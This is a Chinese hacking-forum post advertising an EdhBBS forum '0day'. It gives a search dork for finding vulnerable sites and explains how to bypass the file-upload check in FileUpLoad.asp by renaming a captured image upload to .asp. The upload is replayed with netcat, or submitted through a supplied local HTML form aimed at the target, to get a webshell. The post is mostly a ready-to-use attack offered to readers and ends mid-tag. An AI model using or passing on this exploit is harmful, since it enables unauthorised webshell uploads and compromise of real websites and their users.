EdhBBS 0day
关键字: inurl:EdhBBS
漏洞文件:EdhBBS/FileUpLoad.asp
抓包上传的图片小马
按下图做修改:
clip_image002.jpg (55.7 KB)
2009-12-24 13:00
把JPG直接改为asp,不用在后面加空格
最后用nc上传提交就行了
nc www.xxxxx.com 80 <1.txt
clip_image001.jpg (9.9 KB)
2009-12-24 13:00
成功得到shell???????????
祝大家圣诞快乐(*^__^*) 嘻嘻……
udb311兄弟的提议:
UpLoads/2009-12-24(16-20-49).ASA ``````
本地构造也行哦。不用NC```
代码:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>论坛文件上传</title>
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
font-size:9pt;
}
input{height:19px;font-size:9pt;}
table{font-size:9pt;}
-->
</style></head>
<body scroll="no" onLoad="window.setTimeout('document.body.style.backgroundColor=parent.PadBgColor;',30);">
<form name="form1" enctype="multipart/form-data" method="post"
action="http://www.XXX.com/EdhBBS/FileUpLoad.asp" target="_self" onSubmit="ExtNameChk()"
style="margin:0;padding:0">
<input type="file" name="file">
<input name="ExtName" type="hidden" id="ExtName">
<input type="submit" name="Submit" value="上传附件">
<label></label>
</form>
</body>
<script language="JavaScript" src="
来源:16system.cn
